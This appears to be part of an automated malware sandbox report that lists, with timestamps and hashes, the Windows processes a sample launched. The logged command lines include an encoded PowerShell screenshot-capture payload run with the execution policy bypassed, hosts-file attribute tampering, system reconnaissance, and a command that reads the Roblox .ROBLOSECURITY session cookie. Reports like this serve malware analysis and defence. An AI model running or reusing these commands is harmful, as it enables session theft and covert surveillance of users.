                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                                                            Start time:10:18:10
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                                                            Start time:10:18:10
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                                                            Start time:10:18:10
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                                            Imagebase:0x7ff75f390000
                                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                                                            Start time:10:18:10
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                            Imagebase:0x7ff75d3f0000
                                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                                                            Start time:10:18:11
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                                                            Start time:10:18:11
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                                                            Start time:10:18:11
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                                                                                            Start time:10:18:11
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                                                            Start time:10:18:11
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                                                            Imagebase:0x7ff606800000
                                                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                                                            Start time:10:18:11
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                                            Imagebase:0x7ff75f390000
                                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                                                            Start time:10:18:12
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
                                                                                                                                                                                                                                                            Imagebase:0x7ff65f8f0000
                                                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                                                            Start time:10:18:12
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
                                                                                                                                                                                                                                                            Imagebase:0x7ff7b1b10000
                                                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                                                            Start time:10:18:12
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                                                            Start time:10:18:12
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                                                            Start time:10:18:12
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                                                            Start time:10:18:12
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                                                                                            Start time:10:18:13
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                                            Imagebase:0x7ff75f390000
                                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                                                                                            Start time:10:18:13
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                                            Imagebase:0x7ff75d3f0000
                                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:85
                                                                                                                                                                                                                                                            Start time:10:18:14
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:86
                                                                                                                                                                                                                                                            Start time:10:18:14
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:87
                                                                                                                                                                                                                                                            Start time:10:18:14
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:88
                                                                                                                                                                                                                                                            Start time:10:18:14
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:89
                                                                                                                                                                                                                                                            Start time:10:18:15
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                                            Imagebase:0x7ff75f390000
                                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:90
                                                                                                                                                                                                                                                            Start time:10:18:15
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                            Imagebase:0x7ff78c900000
                                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:91
                                                                                                                                                                                                                                                            Start time:10:18:15
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:92
                                                                                                                                                                                                                                                            Start time:10:18:15
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:93
                                                                                                                                                                                                                                                            Start time:10:18:15
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                                            Imagebase:0x7ff75f390000
                                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:94
                                                                                                                                                                                                                                                            Start time:10:18:19
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                            Imagebase:0x7ff635b70000
                                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
